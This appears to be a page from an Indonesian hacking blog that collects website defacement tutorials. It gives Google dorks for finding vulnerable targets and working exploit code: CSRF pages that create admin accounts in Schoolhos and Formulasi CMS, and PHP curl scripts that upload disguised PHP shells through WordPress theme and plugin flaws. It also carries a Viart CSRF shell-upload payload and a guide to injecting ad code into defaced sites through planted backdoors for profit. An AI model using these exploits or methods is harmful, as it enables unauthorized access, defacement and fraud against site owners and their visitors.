BREAKING NEWS

Deface Website Metode Moxiecode File Browser | File Upload Vulnerability

Deface Website Metode Moxiecode File Browser | File Upload Vulnerability


Deface Website Metode Moxiecode File Browser | File Upload Vulnerability
Deface Website Metode Moxiecode File Browser | File Upload Vulnerability


Dork Google :

intitle : Moxiecode File browser filetype:php
inurl : filemanager/frameset.php

Langkah Moxiecode File Browser 

1. Copy dan search Dork yang sudah saya sediakan, silahkan kembangkan biar nemu yang verawan.

2. Pilih salah satu target, dan jika muncul seperti dibawah ini, maka ada kemungkinan website tersebut Vuln dengan Metode ini, tp belom tentu bisa untuk upload file.

Deface Website Metode Moxiecode File Browser | File Upload Vulnerability
Deface Website Metode Moxiecode File Browser | File Upload Vulnerability
3. Jika berhasil upload, nnti akan ada file anda misal. def.html, tinggal buka saja. Klik Open/View

Contoh Link :

http://www.target.com/tinymce/jscripts/tiny_mce/plugins/filemanager/frameset.php
Semoga bermanfaat.
Sumber : http://www.tkjcyberart.org

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share
>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
// Why So Serious...

Exploit CMS Schoolhos 2017 | CSRF Vulnerability

Exploit CMS Schoolhos 2017 | CSRF Vulnerability


Selamat datang di blog maniak wifi, kali ini kita belajar CSRF kembali, yaitu CSRF CMS Schoolhos dengan mudah, karena kita menggunakan bantuan Dork.

Exploit CMS Schoolhos 2017 | CSRF Vulnerability
Exploit CMS Schoolhos 2017 | CSRF Vulnerability


=================
Dork Schoolhos
=================
Google Dork: 
inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS

==========================
CSRF CMS Schoolhos
==========================
<?php

$self = $_SERVER["PHP_SELF"];

echo 'Target';
echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";
if(!isset($_GET['url'])){
$url = "http://target.com/adminpanel/database/admin.php";
}else
{
$url = $_GET['url'];
}
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>!!Barrabravaz Everywhere!!</title>
 </head>
 <body>

<h1>!!Barrabravaz Everywhere!!</h1>
<?php echo "Target is : $url"; ?>


<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">

Isi username yang mau di isi <INPUT type="text"  name="username" value="barrabravaz"><br>
Pass nya<INPUT type="text"  name="password" value="barrabravaz"><br>

<input type="submit" name="insert" value="Insert" >
</form>
</body>
</html> 

========================================
Jangan dirubah-rubah iya,, hargai yang buat tools :D
========================================

Semoga Bermanfaat :D
Sumber : http://alamshahcyber.blogspot.co.id/2014/07/tutorial-hack-situs-sekolah-cms_9.html

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share
>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
// Why So Serious...

Exploit CMS Formulasi 2017 | CSRF Vulnerability

Exploit CMS Formulasi 2017 | CSRF Vulnerability


Selamat siang para penduduk internet, terima kasih sudah berkunjung ke blog sederhana ini, semoga bermanfaat, kali ini kita akan belajar exploit cms formulasi dengan menggunakan CSRF yang ada dibawah ini, semoga succes :D

Exploit CMS Formulasi 2017 | CSRF Vulnerability
Exploit CMS Formulasi 2017 | CSRF Vulnerability


========================
SQL Injection
========================

Found on

http://localhost/formulasi/kelas-siswa.html 

parameter : kelas

post data : kelas=1{SQL_HERE}

========================
XSS Vulnerability
========================

Found On

parameter : tgl

http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>


========================
CSRF Vulnerability
========================

---------------------BOF--------------------------------------------------

<html>
<head>
<title>Formulasi CRSFT Exploit</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "489","36","27" );

function pausecomp(millis)

{

    var date = new Date();

    var curDate = null;


    do { curDate = new Date(); }

    while(curDate-date < millis);

}


function fireForms()

{

    var count = 3;

    var i=0;

     

    for(i=0; i<count; i++)

    {

        document.forms[i].submit();

         

        pausecomp(pauses[i]);

    }

}

</script>

<H2>Formulasi CSRF Exploit</H2>

<form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah">

<input type="hidden" name="nama_admin" value="usernya"/>

<input type="hidden" name="username" value="Sarahma12"/>

<input type="hidden" name="email" value="research@sarahma.co.id"/>

<input type="hidden" name="level_users" value="1"/>

<input type="hidden" name="password" value="Password12"/>

<input type="hidden" name="password_lagi" value="Password12"/>

</form>

</body>

</html>

---------------------EOF--------------------------------------------------

========================
Solution :
========================

No Update Until This Advisory published

========================
Timeline:
========================

2013-09-27 Provided details vulnerability to vendor

2013-10-01 Second NotificaTon Vendor

2013-10-04 No Response From Vendor

Sumber : https://www.exploit-db.com/

Terima kasih sudah berkunjung ke Blog ini semoga bermanfaat.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share
>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
// Why So Serious...

Cara Mendapatkan Uang Dollar Dengan Deface Website

 Cara Mendapat Uang Dengan Deface Website


Cara Mendapatkan Uang Dollar Dengan Deface Website
Cara Mendapatkan Uang Dollar Dengan Deface Website

       Hello Sobat MAS-TAH berjumpa lagi dengan saya M4574H  ,, di sini saya akan bawakan tutorial Deface Web tapi mendapatkan penghasilan ..
  • Kamu Seorang Defacer ??? Mestinya pernah dong atau Sering deface web orang karena
          sedang galau Atau  kamu cuma iseng saja ...
    Hehehehe ...... 
    Manfaatkan hobimu untuk mencari penghasilan
    Cuma pasang script saja , trus biarin saja sampe dolarnya numpuk hehehe ... 
    Daripada lapor ke admin dan mengharap imbalan tapi ga dibales-bales emailmu kan rugi ...
    Apalagi admin Indo yang ga mau rugi dan songongnya bikin jengkel lagi  hahaha ....

    OK LANGSUNG SAJA SIMAK TUTORIALNYA BERIKUT :

    • Siapin Bahan Berikut :
    + Pc atau laptop ( Gk punya usaha lah masa maunya instant mulu, ke warnet kek jika males pinjam temen atau tetangga dulu )
    + Koneksi internet 
    + Web yang sudah ke Deface + sudah ke tanem Shell Backdoor ,,, Kenapa kog harus  ke tanem         Shell Backdoor ??? Karena Shell Backdoor sendiri berfungsi sebagai akses Control panel sebuah website tersebut
    + Akun iklan jika belom punya bisa daftar di bawah
    + Kopi ( Kalau udah  ngantuk di minum dulu Biar gak ngantuk )
    + Nasi+lauk pauk ( Kalau udah lapar di makan jangan di pandang , Biar bisa konsen )

    • Daftar ke situs iklan PPC di Bawah ini ,, pilih salah satu saja ( Semua juga boleh ) 
             >>> , PopCash , PropellerAds, Poptm
    • Masa Seorang Defacer ngak bisa daftar begituan ,,, Kalo ngak bisa komentar di bawah nanti saya  bimbing sampai bisa ..
    • Selanjutnya pemasangan iklan  .. Nah di sinilah kita akan di bayar karena memasang iklan  tersebut

        Cara Memasang Kode Iklan PropellerAds Ke WEB


    Cara Mendapatkan Uang Dollar Dengan Deface Website
    Cara Mendapatkan Uang Dollar Dengan Deface Website
      1. Pilih Sites . 
      2. Pilih Add new site .
      3. Lalu isi kolom tersebut dengan link web yang sudah ke Deface + sudah ke tanem 
                Shell Backdoor ,,,  ,, kalau sudah klik Create Direct Link  .

      Cara Mendapatkan Uang Dollar Dengan Deface Website
      Cara Mendapatkan Uang Dollar Dengan Deface Website

      4Lalu Copas kode html ( Tag ) tersebut dengan cara klik kode html ( Tag ) tersebut lalu tekan
                    ( CTRL+A ) lalu (CTRL+C) ... lalu masuk ke shell yangg sudah ke tanem di web tersebut .

      Cara Mendapatkan Uang Dollar Dengan Deface Website
      Cara Mendapatkan Uang Dollar Dengan Deface Website

      5. Pilih yang Index.php / index.html .
      6. Lalu Klik Edit .

      Cara Mendapatkan Uang Dollar Dengan Deface Website
      Cara Mendapatkan Uang Dollar Dengan Deface Website

      7. Maka akan muncul kode script index web tersebut ,, lalu letakkan kode html ( tag ) yang
                       kita copas tadi di atas kode script <?php atau di atas kode script <head>  .

      Cara Mendapatkan Uang Dollar Dengan Deface Website
      Cara Mendapatkan Uang Dollar Dengan Deface Website

      8.        Pilih Popunder atau yang lainya juga boleh tergantung minat agan saja lalu klik Next .

      Cara Mendapatkan Uang Dollar Dengan Deface Website
      Cara Mendapatkan Uang Dollar Dengan Deface Website
        
      9. Isi kolom tersebut dengan judul chanel ( Bebas mau di isi apa saja ) .

      Cara Mendapatkan Uang Dollar Dengan Deface Website
      Cara Mendapatkan Uang Dollar Dengan Deface Website

      10. Copy kode html ( tag ) tersebut ,,, bisa liat gambar di atas .

      Cara Mendapatkan Uang Dollar Dengan Deface Website
      Cara Mendapatkan Uang Dollar Dengan Deface Website

      11. Lalu Pastekan kode html ( tag ) yang kita Copy tadi tepat di bawah kode html ( tag )
                              yang pertama kita copas tadi .

      Cara Mendapatkan Uang Dollar Dengan Deface Website
      Cara Mendapatkan Uang Dollar Dengan Deface Website

      12. Jika sudah klik save .

      Kalau sudah tinggal nunggu penghasillannya ,,
      Mudah kan gan tinggal duduk manis saja setelah pasang script tsb.
      __________________________________________________________________________________
      Sekian tutor dari saya maaf apabila ada salah kata ,, 
      maklum gan admin masih seorang NEWBIE 
      yang ingin menjadi seorang MASTAH


      NB : Jika bingung saya sarankan berkomentar di bawah ,,,,

      Ini copas, dari blog Mas Tah,, dia jg copas dari blog gw, jadi gw jg copas aja :v

      Download

      Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
      >> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
      Download Kumpulan Tools Hacking 100% Work
      [ DOWNLOAD ] - [ DOWNLOAD ]

      Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

      Greetz : ./Maniak_WiFi

      \\ Like, Visit, Follow and Share
      >> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
      >> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
      // Why So Serious...

      Kumpulan Link Deep Web 2017 Update Terbaru

      Kumpulan Link Deep Web Update Terbaru

      Selamat malam para penggila internet, kali ini saya akan bagikan beberapa link deepweb yang saya dapat, atau yang saya sering pake untuk sekedar berselancar yah, silahkan liat dibawah ini.

      Kumpulan Link Deep Web Update Terbaru
      Kumpulan Link Deep Web Update Terbaru


      Deep Web Links Update:

      Oke itulah yang bisa saya berikan, semoga bermanfaat :D

      Download
      Link Lengkap dari Sumber yang saya ambil.
      [ VISIT ]
      Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
      >> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
      Download Kumpulan Tools Hacking 100% Work
      [ DOWNLOAD ] - [ DOWNLOAD ]

      Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

      Greetz : ./Maniak_WiFi

      \\ Like, Visit, Follow and Share
      >> Facebook          **    Jack Shredder    >> Twitter          **    @JackTersakiti
      >> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
      // Why So Serious...

      Menambang Bitcoin dengan Mudah dan Cepat 100% Work

      Menambang Bitcoin dengan Mudah dan Cepat 100% Work


      Bitcoin adalah mata uang digital yang sangat populer saat ini, bitcoin bisa didapatkan dengan mudah dengan aplikasi free tanpa berbayar, ataupun dengan aplikasi mining (Miner), semua materi tentang bitcoin akan dibahas dengan lengkap di website yang saya berikan.

      Menambang Bitcoin dengan Mudah dan Cepat 100% Work
      Menambang Bitcoin dengan Mudah dan Cepat 100% Work


      Untuk anda yang pertama mengenal bitcoin sangat cocok membaca artikel yang akan saya berikan, agar lebih mengenal bitcoin dengan baik, dan tidak akan terperangkap dalam sebuah aplikasi atau website SPAM yang marak terjadi sekarang ini.

      Visit [ Free Bitcoin Ku ]

      Download

      Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


      Download Kumpulan Tools Hacking 100% Work
      [ DOWNLOAD ] - [ DOWNLOAD ]

      Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

      Greetz : ./Maniak_WiFi

      \\ Like, Visit, Follow and Share
      >> Facebook          **    Jack Shredder    >> Twitter          **    @JackTersakiti
      >> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
      // Why So Serious...

      Deface Website WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload

      Deface Website WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload


      The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

      An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

      Deface Website WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload
      Deface Website WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload


      Felici 1.7 is vulnerable; other versions may also be affected. 

      <?php
      $uploadfile="cafc.php.jpg";
      $ch =
      curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
      curl_setopt($ch, CURLOPT_POST, true);
      curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('Filedata'=>"@$uploadfile",
      'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      $postResult = curl_exec($ch);
      curl_close($ch);
      print "$postResult";
      ?>

      Download

      Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


      Download Kumpulan Tools Hacking 100% Work
      [ DOWNLOAD ] - [ DOWNLOAD ]

      Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

      Greetz : ./Maniak_WiFi

      \\ Like, Visit, Follow and Share

      >> Facebook          **    Jack Shredder
      >> Instagram          **    /abdur.rozak.mw
      >> Twitter          **    @JackTersakiti
      >> Youtube        **   Pringsewu Cyber Team
      >> BBM           **   57318B69

      // Why So Serious...

      Deface Website WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload

      Deface Website WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload


      * Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
      * Discovery Date: 02.09.2016
      * Public Disclosure Date:03.09.2016
      * Vendor Homepage: http://www.yourinspirationweb.com
      * Exploit Author: Colette Chamberland (Wordfence)
      * Contact: colette@wordfence.com
      * Version: 1.0.8 (may affect newer versions but this was all I had)
      * Tested on: Wordpress 4.2.x-4.4.x

      Deface Website WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload
      Deface Website WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload


      Description
      ================================================================================
       The Beauty Premium theme contains a contact form that is vulnerable to CSRF
       and File Upload vulnerability in the sendmail.php file. The file attachment
       gets uploaded to the wordpress upload directory and it is not sanitized,
       allowing attackers to upload harmful code. 

      PoC
      ================================================================================
      Google Dork inurl:themes/beauty-premium/ or detect via WPScan:

      <form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
      <input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
      <input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
      <input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
      <input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
      <textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test&lt;/textarea&gt;
      <input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
      <li class="submit-button">
      <input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
      <input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
      <input type="hidden" name="id_form" value="test" />
      <input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" /> </li>
      </form>

      You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.

      Download

      Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


      Download Kumpulan Tools Hacking 100% Work
      [ DOWNLOAD ] - [ DOWNLOAD ]

      Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

      Greetz : ./Maniak_WiFi

      \\ Like, Visit, Follow and Share

      >> Facebook          **    Jack Shredder
      >> Instagram          **    /abdur.rozak.mw
      >> Twitter          **    @JackTersakiti
      >> Youtube        **   Pringsewu Cyber Team
      >> BBM           **   57318B69

      // Why So Serious...

      Deface Website Metode WordPress Plugin Premium Gallery Manager - Arbitrary File Upload

      Deface Website Metode WordPress Plugin Premium Gallery Manager - Arbitrary File Upload


      Premium Gallery Manager plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

      An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. 

      <?php
      $uploadfile="Sh1Ne.php.jpg";
      $ch =
      curl_init("http://www.example.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
      curl_setopt($ch, CURLOPT_POST, true);
      curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('Filedata'=>"@$uploadfile",
      'folder'=>'/wp-content/plugins/Premium_Gallery_Manager/uploadify/'));
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      $postResult = curl_exec($ch);
      curl_close($ch);
      print "$postResult";
      ?>
      Download

      Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


      Download Kumpulan Tools Hacking 100% Work
      [ DOWNLOAD ] - [ DOWNLOAD ]

      Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

      Greetz : ./Maniak_WiFi

      \\ Like, Visit, Follow and Share

      >> Facebook          **    Jack Shredder
      >> Instagram          **    /abdur.rozak.mw
      >> Twitter          **    @JackTersakiti
      >> Youtube        **   Pringsewu Cyber Team
      >> BBM           **   57318B69

      // Why So Serious...

      Deface Website Metode Viart Shopping Cart 5.0 - Cross-Site Request Forgery Arbitrary File Upload

      Viart Shopping Cart 5.0 - Cross-Site Request Forgery  Arbitrary File Upload


      <!--
      # Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability
      # Date : 2016/06/12
      # Google Dork : Script-Kiddie ;)
      # Exploit Author : Ali Ghanbari
      # Vendor Homepage : http://www.viart.com/
      # Software Link  : http://www.viart.com/php_shopping_cart_free_evaluation_download.html
      # Version : 5.0

      Deface Website Metode Viart Shopping Cart 5.0
      Deface Website Metode Viart Shopping Cart 5.0


      #POC
      -->

      <html>
        <body onload="submitRequest();">
          <script>
            function submitRequest()
            {
              var xhr = new XMLHttpRequest();
              xhr.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true);
              xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
              xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
              xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
              xhr.withCredentials = "true";
              var body = "-----------------------------256672629917035\r\n" +
                "Content-Disposition: form-data; name=\"dir_root\"\r\n" +
                "\r\n" +
                "../images\r\n" +
                "-----------------------------256672629917035\r\n" +
                "Content-Disposition: form-data; name=\"newfile_0\"; filename=\"[shell.php]\"\r\n" +
                "Content-Type: application/x-php\r\n" +
                "\r\n" +
                "\r\n" +
                "-----------------------------256672629917035--\r\n";
              var aBody = new Uint8Array(body.length);
              for (var i = 0; i < aBody.length; i++)
                aBody[i] = body.charCodeAt(i);
              xhr.send(new Blob([aBody]));
            }
          </script>
        </body>
      </html>

      <!--
      #Desc:

      upload exploit code in your host and send link to admin when admin click on link, you can
      access to your shell from below path :

      http://localhost/images/[your shell]

      ####################################

      [+]Exploit by: Ali Ghanbari

      [+]My Telegram :@Exploiter007  
      -->

      Download

      Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


      Download Kumpulan Tools Hacking 100% Work
      [ DOWNLOAD ] - [ DOWNLOAD ]

      Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

      Greetz : ./Maniak_WiFi

      \\ Like, Visit, Follow and Share

      >> Facebook          **    Jack Shredder
      >> Instagram          **    /abdur.rozak.mw
      >> Twitter          **    @JackTersakiti
      >> Youtube        **   Pringsewu Cyber Team
      >> BBM           **   57318B69

      // Why So Serious...
      Langganan: Postingan ( Atom )
       
      Copyright © 2014 Abdur Rozak. Designed by OddThemes